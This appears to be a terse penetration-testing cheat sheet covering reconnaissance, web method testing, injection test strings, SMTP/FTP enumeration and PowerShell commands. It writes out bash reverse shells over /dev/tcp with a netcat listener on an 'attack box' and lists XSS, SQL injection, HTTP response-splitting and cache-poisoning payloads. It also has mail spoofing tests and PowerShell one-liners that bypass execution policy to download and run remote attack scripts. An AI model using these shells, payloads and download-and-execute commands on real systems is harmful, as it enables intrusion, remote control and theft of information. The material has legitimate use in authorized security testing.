Last updated
Last updated
nmap -vv -Pn -A -sC -sS -T 4 -p- 10.0.0.1
Fingerprint server
Telnet ip_address port
Firefox plugins
All
Specific
Crawl website
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
Web Directory enumeration
nikto [-h target] [options]
Manual Tests
Install Backdoors
ASP
Assorted
Perl
PHP
Python
TCL
Bash Connect Back Shell
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 5<>/dev/tcp/IP_Address/Port Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
Atttack Box: nc -l -p Port -vvv
Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdin Victim: $ exec 1>&0 # Next we copy stdin to stdout Victim: $ exec 2>&0 # And finally stdin to stderr Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
Method Testing
nc IP_Adress Port
HEAD / HTTP/1.0
OPTIONS / HTTP/1.0
PROPFIND / HTTP/1.0
TRACE / HTTP/1.1
PUT
POST HTTP/1.x
Upload Files
curl
curl -u <username:password> -T file_to_upload <Target_URL>
curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
put.pl -h target -r /remote_file_name -f local_file_name
webdav
View Page Source
Hidden Values
Developer Remarks
Extraneous Code
Passwords!
NULL or null
Possible error messages returned.
' , " , ; , <!
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
– , = , + , "
Used to craft SQL Injection queries.
‘ , &, ! , ¦ , < , >
Used to find command execution vulnerabilities.
"><script>alert(1)</script>
Basic Cross-Site Scripting Checks.
%0d%0a
Carriage Return (%0d) Line Feed (%0a)
HTTP Splitting
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
Cache Poisoning
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
%7f , %ff
byte-length overflows; maximum 7- and 8-bit values.
-1, other
Integer and underflow vulnerabilities.
%n , %x , %s
Testing for format string vulnerabilities.
../
Directory Traversal Vulnerabilities.
% , _, *
Wildcard characters can sometimes present DoS issues or information disclosure.
Ax1024+
Overflow vulnerabilities.
Automated table and column iteration
./orderby.py
./d3sqlfuzz.py --
Port 25 open
Fingerprint server
telnet ip_address 25 (banner grab)
Mail Server Testing
Enumerate users
VRFY username (verifies if username exists - enumeration of accounts)
EXPN username (verifies if username is valid - enumeration of accounts)
Mail Spoof Test
HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
Mail Relay Test
HELO anything
Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
Unknown domain - mail from: <user@unknown_domain>
Domain not present - mail from: <user@localhost>
Domain not supplied - mail from: <user>
Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
Examine Configuration Files
sendmail.cf
submit.cf
Is port 21 open?
Fingerprint server
telnet ip_address 21 (Banner grab)
Run command ftp ip_address
ftp@example.com
Check for anonymous access
ftp ip_addressUsername: anonymous OR anonPassword: any@email.com
Password guessing
Examine configuration files
ftpusers
proftpd.conf
Enable Remote Desktop (requires administrative privileges)
set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
Enable Firewall for Remote Desktop
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Add a firewall rule
powershell.exe -command New-NetFirewallRule -s “Allow Inbound Port 80" -Direction Inbound –LocalPort 80 -Protocol TCP -Action Allow powershell.exe -command New-NetFirewallRule DisplayName"Block Outbound Port 80" -Direction Outbound –LocalPort 80 -Protocol TCP -Action Block
View all services
powershell.exe -command Get-Service
Restart service
powershell.exe -command Restart-Service
Configure the DNS server
powershell.exe -command Get-Service SetDNSClientServerAddress -InterfaceAlias "Ethernet"-ServerAddresses 8.8.8.8
Get a Process Listing
powershell.exe -command Get-Process
Get a list of all computers from Active Directory
Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1');Get-NetComputers
Collection of information from the system, registries, and other information
Powershell.exe -exec bypass IEX "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/nishang/master/Gather/GetInformation.ps1'); Get-Information"